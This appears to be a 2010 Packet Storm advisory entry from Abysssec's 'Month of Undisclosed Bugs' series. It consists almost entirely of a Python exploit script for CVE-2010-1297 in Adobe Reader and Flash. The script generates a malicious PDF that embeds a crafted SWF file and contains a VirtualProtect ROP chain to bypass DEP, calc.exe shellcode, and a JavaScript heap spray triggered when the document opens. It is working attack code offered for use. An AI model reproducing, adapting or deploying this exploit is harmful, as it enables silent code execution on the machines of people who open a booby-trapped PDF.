Month Of Abysssec Undisclosed Bugs - Adobe Reader / Flash Invalid Pointer

2010-09-01T00:00:00
ID PACKETSTORM:93394
Type packetstorm
Reporter Abysssec
Modified 2010-09-01T00:00:00

Description

                                        
                                            `'''  
__ __ ____ _ _ ____   
| \/ |/ __ \ /\ | | | | _ \  
| \ / | | | | / \ | | | | |_) |  
| |\/| | | | |/ /\ \| | | | _ < Day 1 (Binary Analysis)  
| | | | |__| / ____ \ |__| | |_) |  
|_| |_|\____/_/ \_\____/|____/  
  
http://www.exploit-db.com/adobe-acrobat-newclass-invalid-pointer-vulnerability/  
http://www.exploit-db.com/sploits/moaub1-adobe-newclass.tar.gz  
  
Title : Adobe Acrobat Reader and Flash Player “newclass” invalid pointer vulnerability  
Analysis : http://www.abysssec.com  
Vendor : http://www.adobe.com  
Impact : Ciritical  
Contact : shahin [at] abysssec.com , info [at] abysssec.com  
Twitter : @abysssec  
CVE : CVE-2010-1297  
MOAUB Number : MOAUB-01-BA  
'''  
  
import sys  
  
class PDF:  
  
def __init__(self):  
self.xrefs = []  
self.eol = '\x0a'  
self.content = ''  
self.xrefs_offset = 0  
  
def header(self):  
self.content += '%PDF-1.6' + self.eol  
  
def obj(self, obj_num, data,flag):  
self.xrefs.append(len(self.content))  
self.content += '%d 0 obj' % obj_num  
if flag == 1:  
self.content += self.eol + '<< ' + data + ' >>' + self.eol  
else:  
self.content += self.eol + data + self.eol  
self.content += 'endobj' + self.eol  
  
def obj_SWFStream(self, obj_num, data, stream):  
self.xrefs.append(len(self.content))  
self.content += '%d 0 obj' % obj_num  
self.content += self.eol + '<< ' + data + '/Params << /Size %d >> /DL %d /Length %d' %(len(stream),len(stream),len(stream))  
self.content += ' >>' + self.eol  
self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol  
self.content += 'endobj' + self.eol  
  
def obj_Stream(self, obj_num, data, stream):  
self.xrefs.append(len(self.content))  
self.content += '%d 0 obj' % obj_num  
self.content += self.eol + '<< ' + data + '/Length %d' %len(stream)  
self.content += ' >>' + self.eol  
self.content += 'stream' + self.eol + stream + self.eol + 'endstream' + self.eol  
self.content += 'endobj' + self.eol  
  
def ref(self, ref_num):  
return '%d 0 R' % ref_num  
  
def xref(self):  
self.xrefs_offset = len(self.content)  
self.content += 'xref' + self.eol  
self.content += '0 %d' % (len(self.xrefs) + 1)  
self.content += self.eol  
self.content += '0000000000 65535 f' + self.eol  
for i in self.xrefs:  
self.content += '%010d 00000 n' % i  
self.content += self.eol  
  
def trailer(self):  
self.content += 'trailer' + self.eol  
self.content += '<< /Size %d' % (len(self.xrefs) + 1)  
self.content += ' /Root ' + self.ref(1) + ' >> ' + self.eol  
self.content += 'startxref' + self.eol  
self.content += '%d' % self.xrefs_offset  
self.content += self.eol  
self.content += '%%EOF'  
  
def generate(self):  
return self.content  
  
  
  
  
class Exploit:  
  
def convert_to_utf16(self, payload):  
enc_payload = ''  
for i in range(0, len(payload), 2):  
num = 0  
for j in range(0, 2):  
num += (ord(payload[i + j]) & 0xff) << (j * 8)  
enc_payload += '%%u%04x' % num  
return enc_payload  
  
def get_payload(self):   
# shellcode calc.exe  
payload =("\x90\x90\x90\x89\xE5\xD9\xEE\xD9\x75\xF4\x5E\x56\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"  
"\x43\x43\x43\x43\x43\x43\x37\x51\x5A\x6A\x41\x58\x50\x30\x41\x30\x41\x6B\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41"  
"\x42\x58\x50\x38\x41\x42\x75\x4A\x49\x4B\x4C\x4B\x58\x51\x54\x43\x30\x43\x30\x45\x50\x4C\x4B\x51\x55\x47\x4C\x4C\x4B\x43\x4C"  
"\x43\x35\x44\x38\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x44\x58\x4C\x4B\x51\x4F\x47\x50\x45\x51\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C"  
"\x4B\x43\x31\x4A\x4E\x46\x51\x49\x50\x4A\x39\x4E\x4C\x4C\x44\x49\x50\x42\x54\x45\x57\x49\x51\x48\x4A\x44\x4D\x45\x51\x49\x52"  
"\x4A\x4B\x4B\x44\x47\x4B\x46\x34\x46\x44\x45\x54\x43\x45\x4A\x45\x4C\x4B\x51\x4F\x47\x54\x43\x31\x4A\x4B\x43\x56\x4C\x4B\x44"  
"\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x43\x31\x4A\x4B\x4C\x49\x51\x4C\x47\x54\x45\x54"  
"\x48\x43\x51\x4F\x46\x51\x4C\x36\x43\x50\x46\x36\x45\x34\x4C\x4B\x50\x46\x50\x30\x4C\x4B\x47\x30\x44\x4C\x4C\x4B\x44\x30\x45"  
"\x4C\x4E\x4D\x4C\x4B\x42\x48\x44\x48\x4D\x59\x4B\x48\x4B\x33\x49\x50\x43\x5A\x46\x30\x45\x38\x4C\x30\x4C\x4A\x45\x54\x51\x4F"  
"\x42\x48\x4D\x48\x4B\x4E\x4D\x5A\x44\x4E\x50\x57\x4B\x4F\x4A\x47\x43\x53\x47\x4A\x51\x4C\x50\x57\x51\x59\x50\x4E\x50\x44\x50"  
"\x4F\x46\x37\x50\x53\x51\x4C\x43\x43\x42\x59\x44\x33\x43\x44\x43\x55\x42\x4D\x50\x33\x50\x32\x51\x4C\x42\x43\x45\x31\x42\x4C"  
"\x42\x43\x46\x4E\x45\x35\x44\x38\x42\x45\x43\x30\x41\x41")  
return payload  
  
  
def getSWF(self):  
try:  
#swfFile = sys.argv[2]  
fdR = open('flash.swf', 'rb+')  
strTotal = fdR.read()  
str1 = strTotal[:88]  
addr1 = '\x06\xa6\x17\x30' # addr = 0c0c0c0c   
str2 = strTotal[92:533]  
#*************************** Bypass DEP by VirtualProtect ********************************  
rop = ''  
rop += "\x77\xFA\x44\x7E" # mov edi,esp ret 4  
rop += "\x94\x28\xc2\x77" #add esp,20 pop ebp ret  
rop += "AAAA" #padding  
rop += "\xD4\x1A\x80\x7C" # VirtualProtect  
rop += "BBBB" # Ret Addr for VirtualProtect  
rop += "CCCC" # Param1 (lpAddress)  
rop += "DDDD" # Param2 (Size)  
rop += "EEEE" # Param3 (flNewProtect)  
rop += "\x10\xB0\xEF\x77" # Param4 (Writable Address)  
rop += "AAAAAAAAAAAA" #padding  
rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret  
rop += "AAAA" #padding  
rop += "\xF2\xE1\x12\x06" #add eax,94 ret  
rop += "\x70\xDC\xEE\x77" #push esp pop ebp ret4  
rop += "\x16\x9A\x94\x7C" #mov [ebp-30],eax ret  
rop += "AAAA" #padding  
rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret  
rop += "AAAA" #padding  
rop += "\xF2\xE1\x12\x06" #add eax,94 ret  
rop += "\x79\x9E\x83\x7C" #mov [ebp-2c],eax ret  
rop += "\x27\x56\xEA\x77" #mov eax,6b3 ret  
rop += "\x14\x83\xE0\x77" #mov [ebp-28],eax ret  
rop += "\xB4\x01\xF2\x77" #xor eax,eax ret  
rop += "\x88\x41\x97\x7C" #add eax,40 pop ebp ret  
rop += "AAAA" #padding  
rop += "\x70\xDC\xEE\x77" #push esp pop ebp ret4  
rop += "\xC0\x9E\xEF\x77" #mov [ebp-54],eax ret  
rop += "AAAA" #padding  
rop += "\xC2\x4D\xC3\x77" #mov eax,edi pop esi ret  
rop += "AAAA" #padding  
rop += "\xC1\xF2\xC1\x77" #add eax,8 ret  
rop += "\xCF\x97\xDE\x77" #xchg eax,esp ret  
  
str3 = strTotal[669:1249]  
alignESP = "\x83\xc4\x03"  
sc = self.get_payload()  
  
if len(sc) > 2118:  
print "[*] Error : payload length is long"  
return  
if len(sc) <= 2118:  
dif = 2118 - len(sc)  
while dif > 0 :  
sc += '\x90'  
dif = dif - 1  
  
str4 = strTotal[3370:3726]  
  
addr2 = '\xF2\x3D\x8D\x23' # Enter 0C75 , 81 RET  
  
str5 = strTotal[3730:]  
  
fdW= open('exploit.swf', 'wb+')  
finalStr = str1+addr1+str2+rop+str3+alignESP+sc+str4+addr2+str5  
fdW.write(finalStr)  
  
#strTotal = open('exploit.swf', 'rb+').read()  
fdW.close()  
fdR.close()  
return finalStr  
  
except IOError:  
print '[*] Error : An IO error has occurred'  
  
def HeapSpray(self):  
spray = '''  
function spray_heap()  
{  
var chunk_size, payload, nopsled;  
  
chunk_size = 0x1A0000;  
pointers = unescape("%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030%u33dd%u3030");  
pointerSled = unescape("<Contents>");  
while (pointerSled.length < chunk_size)  
pointerSled += pointerSled;  
pointerSled_len = chunk_size - (pointers.length + 20);   
pointerSled = pointerSled.substring(0, pointerSled_len);  
heap_chunks = new Array();  
for (var i = 0 ; i < <CHUNKS> ; i++)  
heap_chunks[i] = pointerSled + pointers;  
}   
  
  
spray_heap();   
'''  
  
spray = spray.replace('<Contents>', '%u33dd%u3030') # Pointer to XCHG ESP , EBX  
'''  
Authplay.dll  
  
303033DD ? 87DC XCHG ESP,EBX  
  
#############################################################  
will do nothing   
  
303033DF ? 45 INC EBP  
303033E0 ? 05 00898784 ADD EAX,84878900  
303033E5 ? 42 INC EDX  
303033E6 ? 05 008987E8 ADD EAX,E8878900  
303033EB ? 41 INC ECX  
303033EC ? 05 008987EC ADD EAX,EC878900  
303033F1 ? 41 INC ECX  
303033F2 ? 05 008987F0 ADD EAX,F0878900  
303033F7 ? 41 INC ECX  
303033F8 ? 05 008987F4 ADD EAX,F4878900  
303033FD ? 41 INC ECX  
303033FE ? 05 005F5E5D ADD EAX,5D5E5F00  
30303403 . B8 01000000 MOV EAX,1  
30303408 . 5B POP EBX  
############################################################  
  
30303409 . 83C4 30 ADD ESP,30  
3030340C . C3 RETN  
  
'''  
  
spray = spray.replace('<CHUNKS>', '40') #Chunk count  
return spray  
  
def generate_pdf():  
exploit = Exploit()  
swfFile = 'exploit.swf'  
pdf = PDF()  
pdf.header()  
pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) + ' /OpenAction ' + pdf.ref(17),1)  
#pdf.obj(1, '/MarkInfo<</Marked true>>/Type /Catalog/Pages ' + pdf.ref(2) ,1)  
pdf.obj(2, '/Count 1/Type/Pages/Kids[ '+pdf.ref(3)+' ]',1)  
pdf.obj(3, '/Annots [ '+pdf.ref(5) +' ]/Parent '+pdf.ref(2) + " /Type/Page"+' /Contents '+pdf.ref(4) ,1)  
pdf.obj_Stream(4, '','')  
pdf.obj(5, '/RichMediaSettings '+pdf.ref(6)+' /NM ( ' + swfFile + ' ) /Subtype /RichMedia /Type /Annot /RichMediaContent '+pdf.ref(7)+' /Rect [ 266 116 430 204 ]',1)  
pdf.obj(6, '/Subtype /Flash /Activation '+pdf.ref(8)+' /Type /RichMediaSettings /Deactivation '+pdf.ref(9),1)   
pdf.obj(7, '/Type /RichMediaContent /Assets '+pdf.ref(10) +' /Configurations [ ' + pdf.ref(11) + ']',1)  
pdf.obj(8, '/Type /RichMediaActivation /Condition /PO ',1)   
pdf.obj(9, '/Type /RichMediaDeactivation /Condition /XD ',1)   
pdf.obj(10, '/Names [('+ swfFile +') ' + pdf.ref(12)+' ]',1)   
pdf.obj(11, '/Subtype /Flash /Type /RichMediaConfiguration /Name (ElFlash) /Instances [ '+pdf.ref(13) +' ]',1)   
pdf.obj(12, '/EF <</F '+pdf.ref(14) +' >> /Type /Filespec /F ('+ swfFile +')',1)   
pdf.obj(13, '/Subype /Flash /Params '+pdf.ref(15) +' /Type /RichMediaInstance /Asset '+ pdf.ref(12) ,1)  
pdf.obj_SWFStream(14, ' /Type /EmbeddedFile ',exploit.getSWF() )   
pdf.obj(15, '/Binding /Background /Type /RichMediaParams /FlashVars () /Settings '+pdf.ref(16),1)  
pdf.obj_Stream(16, '<</Length 0 >> ','')   
pdf.obj(17, '/Type /Action /S /JavaScript /JS (%s)' % exploit.HeapSpray(),1)  
  
pdf.xref()  
pdf.trailer()  
return pdf.generate()  
  
def main():  
if len(sys.argv) != 2:  
print 'Usage: python %s [output file name]' % sys.argv[0]  
sys.exit(0)  
file_name = sys.argv[1]  
if not file_name.endswith('.pdf'):  
file_name = file_name + '.pdf'  
try:  
fd = open(file_name, 'wb+')  
fd.write(generate_pdf())  
fd.close()  
print '[-] PDF file generated and written to %s' % file_name  
except IOError:  
print '[*] Error : An IO error has occurred'  
print '[-] Exiting ...'  
sys.exit(-1)  
if __name__ == '__main__':  
main()  
  
`